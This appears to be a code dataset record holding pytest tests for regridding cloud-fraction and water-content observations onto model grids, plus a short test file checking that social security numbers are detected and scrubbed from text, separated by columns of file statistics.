def test_regrid_cf_volume(model_file, obs_file):
    """cf volume: 6 of the 12 cells are nonzero -> 0.5."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
    grid = {'cf_V': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_V']
    assert x[0, 0] == 0.5


def test_regrid_cf_volume_nan(model_file, obs_file):
    """cf volume: scattered NaNs do not change the 0.5 volume fraction."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, np.nan, 1], [0, 1, 1], [np.nan, 0, 1], [0, 0, 0]])
    grid = {'cf_V': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_V']
    assert x[0, 0] == 0.5


def test_regrid_cf_volume_all_nan(model_file, obs_file):
    """cf volume: an all-NaN window yields NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan],
                     [np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan]])
    grid = {'cf_V': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_V']
    testing.assert_equal(x, np.nan)


def test_regrid_cf_volume_masked(model_file, obs_file):
    """cf volume with one masked row: 4 of the 9 remaining cells -> 0.444."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
    data[1, :] = ma.masked
    grid = {'cf_V': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_V']
    assert round(x[0, 0], 3) == 0.444


def test_regrid_cf_volume_all_masked(model_file, obs_file):
    """cf volume: a fully masked window yields NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
    data[:, :] = ma.masked
    grid = {'cf_V': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_V']
    testing.assert_equal(x, np.nan)
def test_reshape_data_to_window(model_file, obs_file):
    """A window anchored at the origin extracts the top-left 3x2 sub-array."""
    observation = ObservationManager(PRODUCT, str(obs_file))
    managed_model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    product_grid = ProductGrid(managed_model, observation)
    time_index = np.array([1, 1, 1, 0, 0, 0])
    height_index = np.array([1, 1, 0, 0])
    window = np.array([[1, 1, 0, 0],
                       [1, 1, 0, 0],
                       [1, 1, 0, 0],
                       [0, 0, 0, 0],
                       [0, 0, 0, 0],
                       [0, 0, 0, 0]], dtype=bool)
    product_grid._obs_data = np.array([[1, 2, 3, 4],
                                       [11, 22, 33, 44],
                                       [111, 222, 333, 444],
                                       [5, 6, 7, 8],
                                       [55, 66, 77, 88],
                                       [555, 666, 777, 888]])
    result = product_grid._reshape_data_to_window(window, time_index, height_index)
    expected = np.array([[1, 2], [11, 22], [111, 222]])
    testing.assert_array_almost_equal(result, expected)


def test_reshape_data_to_window_middle(model_file, obs_file):
    """A window in the interior extracts the matching 3x2 sub-array."""
    observation = ObservationManager(PRODUCT, str(obs_file))
    managed_model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    product_grid = ProductGrid(managed_model, observation)
    time_index = np.array([0, 0, 1, 1, 1, 0])
    height_index = np.array([0, 1, 1, 0])
    window = np.array([[0, 0, 0, 0],
                       [0, 0, 0, 0],
                       [0, 1, 1, 0],
                       [0, 1, 1, 0],
                       [0, 1, 1, 0],
                       [0, 0, 0, 0]], dtype=bool)
    product_grid._obs_data = np.array([[1, 2, 3, 4],
                                       [11, 22, 33, 44],
                                       [111, 222, 333, 444],
                                       [5, 6, 7, 8],
                                       [55, 66, 77, 88],
                                       [555, 666, 777, 888]])
    result = product_grid._reshape_data_to_window(window, time_index, height_index)
    expected = np.array([[222, 333], [6, 7], [66, 77]])
    testing.assert_array_almost_equal(result, expected)


def test_reshape_data_to_window_empty(model_file, obs_file):
    """An empty height selection makes the reshape return None."""
    observation = ObservationManager(PRODUCT, str(obs_file))
    managed_model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    product_grid = ProductGrid(managed_model, observation)
    time_index = np.array([1, 1, 1, 0, 0, 0])
    height_index = np.array([0, 0, 0, 0])
    window = np.array([1, 1, 0, 0], dtype=bool)
    result = product_grid._reshape_data_to_window(window, time_index, height_index)
    assert result is None
# NOTE: every test in this family previously used a local variable named
# `dict`, shadowing the builtin; it is renamed to `grid` throughout.

def test_regrid_iwc(model_file, obs_file):
    """Regridded iwc for the selected rain-free cells averages to 1.4."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 3]])
    grid = {'iwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc']
    testing.assert_almost_equal(x[0, 0], 1.4)


def test_regrid_iwc_nan(model_file, obs_file):
    """NaNs inside the selection are excluded from the iwc mean (-> 1.5)."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, np.nan, 1],
                              [2, np.nan, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, np.nan]])
    grid = {'iwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc']
    testing.assert_almost_equal(x[0, 0], 1.5)


def test_regrid_iwc_all_nan(model_file, obs_file):
    """An all-NaN observation field regrids iwc to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan]])
    grid = {'iwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc']
    testing.assert_almost_equal(x[0, 0], np.nan)


def test_regrid_iwc_masked(model_file, obs_file):
    """Masked observation rows are excluded from the iwc mean (-> 1.0)."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    obj._obs_data[1, :] = ma.masked
    grid = {'iwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc']
    testing.assert_almost_equal(x[0, 0], 1.0)


def test_regrid_iwc_all_masked(model_file, obs_file):
    """A fully masked observation field regrids iwc to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    obj._obs_data[:, :] = ma.masked
    grid = {'iwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc']
    testing.assert_almost_equal(x[0, 0], np.nan)


def test_regrid_iwc_none(model_file, obs_file):
    """An empty no-rain selection regrids iwc to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    grid = {'iwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 0, 0, 0],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc']
    testing.assert_equal(x[0, 0], np.nan)
# NOTE: every test in this family previously used a local variable named
# `dict`, shadowing the builtin; it is renamed to `grid` throughout.
# The iwc_att values come from the obs_file fixture (via obs.data['iwc_att']),
# not from an array set in the test — TODO confirm against conftest.

def test_regrid_iwc_att(model_file, obs_file):
    """Regridded attenuated iwc over the selection is 0.018."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    grid = {'iwc_att': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_att']
    testing.assert_almost_equal(x[0, 0], 0.018)


def test_regrid_iwc_att_masked(model_file, obs_file):
    """A partial mask on iwc_att leaves the regridded value at 0.018."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_obj.data['iwc_att'][:].mask = ma.array([[1, 0, 1, 0],
                                                     [0, 1, 1, 0],
                                                     [1, 0, 0, 1],
                                                     [0, 1, 1, 1],
                                                     [1, 1, 0, 0],
                                                     [0, 1, 0, 1]], dtype=bool)
    grid = {'iwc_att': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_att']
    testing.assert_almost_equal(x[0, 0], 0.018)


def test_regrid_iwc_att_all_masked(model_file, obs_file):
    """A fully masked iwc_att field regrids to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_obj.data['iwc_att'][:].mask = ma.array([[1, 1, 1, 1],
                                                     [1, 1, 1, 1],
                                                     [1, 1, 1, 1],
                                                     [1, 1, 1, 1],
                                                     [1, 1, 1, 1],
                                                     [1, 1, 1, 1]], dtype=bool)
    grid = {'iwc_att': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_att']
    testing.assert_almost_equal(x[0, 0], np.nan)


def test_regrid_iwc_att_none(model_file, obs_file):
    """An empty no-rain selection regrids iwc_att to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    grid = {'iwc_att': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 0, 0, 0],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0],
                        [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_att']
    assert np.isnan(x[0, 0])
# NOTE: every test in this family previously used a local variable named
# `dict`, shadowing the builtin; it is renamed to `grid` throughout.

def test_regrid_iwc_rain(model_file, obs_file):
    """iwc_rain averages the selected cells including rain (-> 2.3)."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 3]])
    grid = {'iwc_rain': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 1, 1, 1],
                    [0, 0, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_rain']
    testing.assert_almost_equal(x[0, 0], 2.3)


def test_regrid_iwc_rain_nan(model_file, obs_file):
    """NaNs in the selection are excluded from the iwc_rain mean (-> 2.429)."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, np.nan, 1, 1],
                              [2, 2, 2, np.nan],
                              [3, 3, 3, 3],
                              [np.nan, 4, 4, np.nan]])
    grid = {'iwc_rain': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 1, 1, 1],
                    [0, 0, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_rain']
    testing.assert_almost_equal(round(x[0, 0], 3), 2.429)


def test_regrid_iwc_rain_all_nan(model_file, obs_file):
    """An all-NaN observation field regrids iwc_rain to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan]])
    grid = {'iwc_rain': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 1, 1, 1],
                    [0, 0, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_rain']
    testing.assert_almost_equal(x[0, 0], np.nan)


def test_regrid_iwc_rain_masked(model_file, obs_file):
    """A masked row is excluded from the iwc_rain mean (-> 2.143)."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    obj._obs_data[2, :] = ma.masked
    grid = {'iwc_rain': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 1, 1, 1],
                    [0, 0, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_rain']
    testing.assert_almost_equal(round(x[0, 0], 3), 2.143)


def test_regrid_iwc_rain_all_masked(model_file, obs_file):
    """A fully masked observation field regrids iwc_rain to NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 3, 1, 1],
                              [2, 2, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    obj._obs_data[:, :] = ma.masked
    grid = {'iwc_rain': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 1, 1, 1],
                    [0, 0, 1, 1]], dtype=bool)
    no_rain = ma.array([[0, 1, 1, 1],
                        [0, 0, 1, 1],
                        [0, 1, 1, 1],
                        [0, 0, 1, 1]], dtype=bool)
    grid = obj._regrid_iwc(grid, 0, 0, ind, no_rain)
    x = grid['iwc_rain']
    testing.assert_equal(x[0, 0], np.nan)
# NOTE: every test in this family previously used a local variable named
# `dict`, shadowing the builtin; it is renamed to `grid` throughout.

def test_regrid_product(model_file, obs_file):
    """Regridded lwc is the mean of the selected observation cells (-> 1.4)."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 1, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    grid = {'lwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_product(grid, 0, 0, ind)
    x = grid['lwc']
    testing.assert_almost_equal(x[0, 0], 1.4)


def test_regrid_product_nan(model_file, obs_file):
    """NaNs inside the selection are excluded from the lwc mean (-> 1.5)."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, np.nan, 1, 1],
                              [np.nan, 1, 2, 2],
                              [3, 3, np.nan, 3],
                              [4, np.nan, 4, 4]])
    grid = {'lwc': np.zeros((1, 1))}
    ind = ma.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_product(grid, 0, 0, ind)
    x = grid['lwc']
    testing.assert_almost_equal(x[0, 0], 1.5)


def test_regrid_product_all_nan(model_file, obs_file):
    """An all-NaN observation field regrids lwc to NaN."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan],
                              [np.nan, np.nan, np.nan, np.nan]])
    grid = {'lwc': np.zeros((1, 1))}
    ind = np.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_product(grid, 0, 0, ind)
    x = grid['lwc']
    testing.assert_almost_equal(x[0, 0], np.nan)


def test_regrid_product_masked(model_file, obs_file):
    """A masked row outside the selection does not change the mean (-> 1.4)."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 1, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    obj._obs_data[2, :] = ma.masked
    grid = {'lwc': np.zeros((1, 1))}
    ind = np.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_product(grid, 0, 0, ind)
    x = grid['lwc']
    testing.assert_almost_equal(x[0, 0], 1.4)


def test_regrid_product_all_masked(model_file, obs_file):
    """A fully masked observation field regrids lwc to NaN."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 1, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    obj._obs_data[:, :] = ma.masked
    grid = {'lwc': np.zeros((1, 1))}
    ind = np.array([[0, 1, 1, 1],
                    [0, 0, 1, 1],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_product(grid, 0, 0, ind)
    x = grid['lwc']
    testing.assert_almost_equal(x, np.nan)


def test_regrid_product_none(model_file, obs_file):
    """An empty selection regrids lwc to NaN."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    obj._obs_data = ma.array([[1, 1, 1, 1],
                              [2, 1, 2, 2],
                              [3, 3, 3, 3],
                              [4, 4, 4, 4]])
    grid = {'lwc': np.zeros((1, 1))}
    ind = np.array([[0, 0, 0, 0],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0],
                    [0, 0, 0, 0]], dtype=bool)
    grid = obj._regrid_product(grid, 0, 0, ind)
    # Removed an unused `compare = np.nanmean(obj._obs_data[ind])` line: its
    # result was never asserted and nanmean over an empty selection raises a
    # RuntimeWarning.
    x = grid['lwc']
    testing.assert_almost_equal(x[0, 0], np.nan)
@pytest.mark.parametrize("product", [
    "cf_A", "cf_V", "cf_A_adv", "cf_V_adv"])
def test_append_data2object_cf(product, model_file, obs_file):
    """Every cf output variable is appended to the model data."""
    observation = ObservationManager('cf', str(obs_file))
    managed_model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'cf')
    ProductGrid(managed_model, observation)
    assert f"{product}_{MODEL}" in managed_model.data


@pytest.mark.parametrize("product", [
    "iwc", "iwc_att", "iwc_rain",
    "iwc_adv", "iwc_att_adv", "iwc_rain_adv"])
def test_append_data2object_iwc(product, model_file, obs_file):
    """Every iwc output variable is appended to the model data."""
    observation = ObservationManager('iwc', str(obs_file))
    managed_model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'iwc')
    ProductGrid(managed_model, observation)
    assert f"{product}_{MODEL}" in managed_model.data


@pytest.mark.parametrize("product", [
    "lwc", "lwc_adv"])
def test_append_data2object_lwc(product, model_file, obs_file):
    """Every lwc output variable is appended to the model data."""
    observation = ObservationManager('lwc', str(obs_file))
    managed_model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    ProductGrid(managed_model, observation)
    assert f"{product}_{MODEL}" in managed_model.data
| 39.543092
| 79
| 0.517782
| 4,184
| 28,906
| 3.397467
| 0.027247
| 0.043757
| 0.035667
| 0.037144
| 0.94351
| 0.923602
| 0.903482
| 0.890749
| 0.890327
| 0.881815
| 0
| 0.065386
| 0.315886
| 28,906
| 730
| 80
| 39.59726
| 0.653451
| 0
| 0
| 0.812598
| 0
| 0
| 0.028645
| 0
| 0
| 0
| 0
| 0
| 0.074016
| 1
| 0.074016
| false
| 0
| 0.011024
| 0
| 0.085039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2cfd9f3bcd6b6e8a37b69acc0c2fa9bc784ea45
| 167
|
py
|
Python
|
deepr/examples/multiply/layers/__init__.py
|
drohde/deepr
|
672772ea3ce9cf391f9f8efc7ae9c9d438957817
|
[
"Apache-2.0"
] | 50
|
2020-05-19T17:29:44.000Z
|
2022-01-15T20:50:50.000Z
|
deepr/examples/multiply/layers/__init__.py
|
drohde/deepr
|
672772ea3ce9cf391f9f8efc7ae9c9d438957817
|
[
"Apache-2.0"
] | 75
|
2020-05-20T16:53:37.000Z
|
2022-01-12T15:53:46.000Z
|
deepr/examples/multiply/layers/__init__.py
|
drohde/deepr
|
672772ea3ce9cf391f9f8efc7ae9c9d438957817
|
[
"Apache-2.0"
] | 17
|
2020-05-25T13:23:03.000Z
|
2022-02-21T11:22:08.000Z
|
# pylint: disable=unused-import,missing-docstring
from deepr.examples.multiply.layers.loss import SquaredL2
from deepr.examples.multiply.layers.model import Multiply
| 33.4
| 57
| 0.844311
| 22
| 167
| 6.409091
| 0.636364
| 0.12766
| 0.241135
| 0.35461
| 0.439716
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.071856
| 167
| 4
| 58
| 41.75
| 0.903226
| 0.281437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b2d5e4745e13ad509acdafd167e4e0733a37cbb8
| 1,254
|
py
|
Python
|
tests/test_ssn.py
|
seattleopendata/scrubadub
|
00522458640d1ba6eddf5b2772ebd0bbf62cb4e2
|
[
"MIT"
] | 3
|
2019-04-14T04:13:40.000Z
|
2020-04-22T05:10:28.000Z
|
tests/test_ssn.py
|
seattleopendata/scrubadub
|
00522458640d1ba6eddf5b2772ebd0bbf62cb4e2
|
[
"MIT"
] | null | null | null |
tests/test_ssn.py
|
seattleopendata/scrubadub
|
00522458640d1ba6eddf5b2772ebd0bbf62cb4e2
|
[
"MIT"
] | 3
|
2020-04-18T15:25:33.000Z
|
2021-06-12T02:58:01.000Z
|
import unittest
from base import BaseTestCase
class SSNTestCase(unittest.TestCase, BaseTestCase):
    # NOTE(review): the BEFORE/AFTER docstrings below look like they are parsed
    # by BaseTestCase.compare_clean_before_after / compare_scan_before_after as
    # the test input and expected output — confirm before editing any docstring
    # text; it is behavioral, not documentation.

    def test_clean_hyphens(self):
        """
        BEFORE: My social security number is 812-80-1276
        AFTER: My social security number is {{SSN}}
        """
        # Hyphen-separated SSN should be replaced by the placeholder.
        self.compare_clean_before_after()

    def test_clean_dots(self):
        """
        BEFORE: My social security number is 812.80.1276
        AFTER: My social security number is {{SSN}}
        """
        # Dot-separated SSN should be replaced by the placeholder.
        self.compare_clean_before_after()

    def test_clean_spaces(self):
        """
        BEFORE: My social security number is 812 80 1276
        AFTER: My social security number is {{SSN}}
        """
        # Space-separated SSN should be replaced by the placeholder.
        self.compare_clean_before_after()

    def test_scan_hyphens(self):
        """
        BEFORE: My social security number is 812-80-1276
        AFTER: ssn
        """
        # Scanning should identify the hyphen-separated SSN as type 'ssn'.
        self.compare_scan_before_after()

    def test_scan_dots(self):
        """
        BEFORE: My social security number is 812.80.1276
        AFTER: ssn
        """
        # Scanning should identify the dot-separated SSN as type 'ssn'.
        self.compare_scan_before_after()

    def test_scan_spaces(self):
        """
        BEFORE: My social security number is 812 80 1276
        AFTER: ssn
        """
        # Scanning should identify the space-separated SSN as type 'ssn'.
        self.compare_scan_before_after()
| 25.591837
| 56
| 0.601276
| 152
| 1,254
| 4.763158
| 0.184211
| 0.099448
| 0.198895
| 0.273481
| 0.867403
| 0.861878
| 0.861878
| 0.861878
| 0.861878
| 0.861878
| 0
| 0.062572
| 0.311802
| 1,254
| 48
| 57
| 26.125
| 0.776362
| 0.370016
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.133333
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
